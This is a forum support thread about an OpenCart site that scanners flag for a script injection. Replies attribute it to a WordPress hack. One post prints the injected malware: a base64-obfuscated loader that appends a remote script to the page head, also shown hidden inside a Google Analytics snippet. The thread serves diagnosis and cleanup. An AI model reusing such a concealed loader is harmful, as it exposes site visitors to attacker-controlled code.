Whenever I've done malware scans or error checking it generally passes without issue, but occasionally I see mention of a possible injection attack. And it's always this same js file: https://www.jctfinancial.com/wp-content ... plugins.js
See the below scan results for confirmation:
https://rescan.pro/result.php?5c246c4ba ... dc0e071ed3
I've tried browsing the site in Firefox using debug mode and it too shows a warning against this. However, I can't find which of the files on my site contains any links to this. I've done a search on the contents of a full backup of the site and can't find any files containing that URL and I can't see how in Firefox it's possible to determine where that link is coming from.
If anyone can shed any light I'd be very grateful.
Opencart 2.3.0.2. Journal 2 template.
for Journal, to make an OpenCart Software work.


---
But you also seem to use Wordpress on the same Site, and that makes it even more
dangerous. But I also recall an insecure Journal-2 Edition to be mentioned a while
ago, so, better get a professional, because nobody else would be able or willing, to
assist in such an installation.
Good Luck ...
Ernie
Please do NOT send me Personal Mails, they will no longer be replied to.
---
My Github OC Site: https://github.com/IP-CAM
2'800+ FREE OC Extensions on the World's largest Github OC Repository Archive Site.
since that kind of Coding is far from the 'regular' way of 'handling' OC.
Still, your problem is not directly related to OC, it's a Wordpress Hack, as it
looks, doing bad things to your Site.
Ernie
Please do NOT send me Personal Mails, they will no longer be replied to.
---
My Github OC Site: https://github.com/IP-CAM
2'800+ FREE OC Extensions on the World's largest Github OC Repository Archive Site.
Code: Select all
var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);
Code: Select all
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-34406391-6"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
var api_service = atob('aHR0cHM6Ly93d3cuamN0ZmluYW5jaWFsLmNvbS93cC1jb250ZW50L3BsdWdpbnMvcGx1Z2lucy5qcw==');
var api = document.createElement('script');api.src = api_service;document.head.appendChild(api);
gtag('js', new Date());
gtag('config', 'UA-34406391-6');
</script>
Even though you're not running a Wordpress site, this implies that there are still WP files uploded to the server. Is that the case? Hackers don't care whether or not you're actually running a WP site. They just want to find files and hack them so the malicious code gets executed and spread around.
ELEV8TE Website Development
https://www.elev8your.com
That's correct ! And hacking Attempts on OC Sites are not uncommon, I frequentlyHackers don't care whether or not you're actually running a WP site.
redirect such Calls, by use of a fine 1.5.x Extension, as you can see on the image below.

Ernie
---
Please do NOT send me Personal Mails, they will no longer be replied to.
---
My Github OC Site: https://github.com/IP-CAM
2'800+ FREE OC Extensions on the World's largest Github OC Repository Archive Site.
Users browsing this forum: No registered users and 9 guests